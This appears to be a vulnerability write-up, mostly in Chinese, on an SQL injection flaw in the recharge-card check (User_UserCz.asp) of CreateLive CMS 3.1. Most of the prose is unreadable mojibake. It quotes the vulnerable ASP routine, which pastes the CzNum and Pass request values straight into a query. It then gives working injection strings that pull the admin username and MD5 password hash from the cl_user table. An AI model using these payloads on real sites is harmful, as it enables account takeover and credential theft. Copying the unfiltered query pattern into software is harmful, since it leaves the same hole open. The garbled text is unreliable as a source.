CreateLive CMS 3.1ע©

俴12·ݵ鿯CreateLive CMS 4.2ע©ǳиҲCreateLive CMSϵͳģǰ汾3.1ģӦҲɣ
     վǿעġʼɣ
 
  עļuser/User_UserCz.asp,ڶchkCzNumУCzNumCzUserPassûй˾ͱѯУγע©©ʹע빤߲½⣬Ҫԭ֤ʹPOSTύش:
 
<--more-->
 
  Sub chkCzNum()
 Dim CzUser,Self,CzNum,Pass
 Dim sPoint,sPointAll,sDayNum,sDayNumAll
 Dim rsUser,ChargeType
 CzUser = Trim(request("CzUser"))
 Self = Trim(request("Self"))
 CzNum = Trim(request("CzNum"))
 Pass = Trim(request("Pass"))
 if CzNum="" or Pass="" then
  Call Cl.OutMsg("ֵŻֵ벻Ϊգ","User_UserCz.asp")
 end if
 if Not Cl.CodeIsTrue(Trim(request("ChkPlusCz")),"ChkPlusCz") then
  Call Cl.OutMsg("֤벻ȷ","User_UserCz.asp")
 end if
 dim rsCz
 set rsCz=Server.CreateObject("Adodb.RecordSet")
 OpenConn : rsCz.open "Select * from Cl_UserCz where CzNum="&CzNum&" and Pass="&Pass&"",Conn,1,3
 if rsCz.bof and rsCz.eof then
  rsCz.close:set rsCz=Nothing
  Call Cl.OutMsg("ڴ˳ֵ룡","User_UserCz.asp")
 End if
 sPoint =rsCz("Point")
 sDayNum =rsCz("DayNum")
 if rsCz("IsUser")<>0 then
  rsCz.close:set rsCz=Nothing
  Call Cl.OutMsg("óֵѱʹã","User_UserCz.asp")
 end if
 
  ڡֵֵ룬ڡֵšעͿȻֵť


ش󣬿ȷݿmssql
 
  Ҫcl_admincl_userû,cl_adminǹԱıֶusername,passwordcl_userû,ֶκ͹Աıһ
 
  3 and 1=(select username from cl_user where userid=1);--    һûAdmin

3 and 1=(select userpassword from cl_user where userid=1);--   AdminûΪmd5

ݱûе¼